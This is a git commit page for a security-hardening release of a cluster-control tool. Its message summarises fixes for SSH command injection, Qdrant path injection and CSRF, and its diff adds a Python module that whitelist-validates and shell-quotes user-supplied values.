v0.19.0:0 - harden cluster-control surface: ssh injection, qdrant path, csrf

Triaged from a full independent evaluation (EVALUATION.md). Addresses the
three P0/P1 code findings; the proxy/data APIs that downstream apps consume
are deliberately untouched.

- ssh command injection (P0): new shellsafe.py validates + shlex.quotes every
  user-supplied value crossing into an SSH command on the Sparks (model repo,
  vllm args/knobs, NIM image/container/volume/port/env, service names).
  Boundary validation on POST /api/models and POST /api/nim/install; quoting at
  every sink in models/download/nim/services. NGC key now quoted too.
- qdrant path injection (P1): /api/search validates the collection name against
  a metacharacter-free whitelist and URL-encodes the path segment.
- csrf (P1): csrf_guard middleware enforces same-origin on state-changing
  control endpoints; /v1/*, /scrub, /rehydrate, /api/search, /api/audio/* and
  /api/health-event are exempt so external consumers are unaffected.

Verified: injection survives only as a single quoted token, vLLM preflight
shlex.split round-trip intact, CSRF behaviors covered via TestClient, both
offline redaction suites still pass, tsc clean, s9pk rebuilt.
This commit is contained in:
Keysat
2026-06-12 16:36:33 -05:00
parent 98988057a2
commit 1c4e861783
10 changed files with 260 additions and 24 deletions
+60
View File
@@ -0,0 +1,60 @@
"""Validation + safe-quoting for user-supplied values that cross into SSH shell
commands on the Sparks.
Two layers of defense (same spirit as disk.py's `_SAFE_DIRNAME`):
1. Validate at the API boundary against a strict whitelist — rejects junk
early with a clear error, and guarantees the value carries no shell
metacharacters (so it is also safe to drop into echo/log lines).
2. `quote_arg` / `quote_args` at the actual interpolation site — the real
guarantee: even a value that somehow skips validation cannot break out of
the command.
Rule: anything user-controlled that ends up in an `ssh_run` / `ssh_stream`
command string must go through one of these, never be raw f-string'd.
"""
from __future__ import annotations
import re
import shlex
# Hugging Face repo 'org/name'. HF identifiers allow letters, digits, dot, dash,
# underscore; exactly one slash separates org from name.
_HF_REPO_RE = re.compile(r"^[A-Za-z0-9._-]+/[A-Za-z0-9._-]+$")
# Docker/OCI image reference: registry/path/name[:tag][@sha256:digest].
# Conservative charset covering e.g. nvcr.io/nim/nvidia/parakeet-...:latest and
# @digest pins; excludes every shell metacharacter.
_IMAGE_RE = re.compile(r"^[A-Za-z0-9][A-Za-z0-9._:/@-]*$")
# Docker container / volume name (Docker's own rule).
_CONTAINER_RE = re.compile(r"^[A-Za-z0-9][A-Za-z0-9_.-]*$")
def validate_repo(repo: str) -> str:
"""Return `repo` if it is a well-formed 'org/name'; else raise ValueError."""
if not _HF_REPO_RE.fullmatch(repo or ""):
raise ValueError(f"invalid model repo (expected 'org/name'): {repo!r}")
return repo
def validate_image(image: str) -> str:
"""Return `image` if it is a well-formed container image ref; else ValueError."""
if not image or len(image) > 512 or not _IMAGE_RE.fullmatch(image):
raise ValueError(f"invalid container image reference: {image!r}")
return image
def validate_container(name: str) -> str:
"""Return `name` if it is a valid Docker container/volume name; else ValueError."""
if not name or len(name) > 128 or not _CONTAINER_RE.fullmatch(name):
raise ValueError(f"invalid container name: {name!r}")
return name
def quote_arg(value: object) -> str:
"""shlex.quote a single token for safe embedding in a shell command string."""
return shlex.quote(str(value))
def quote_args(values: object) -> str:
"""shlex.quote each token and join with spaces."""
return " ".join(shlex.quote(str(v)) for v in values) # type: ignore[union-attr]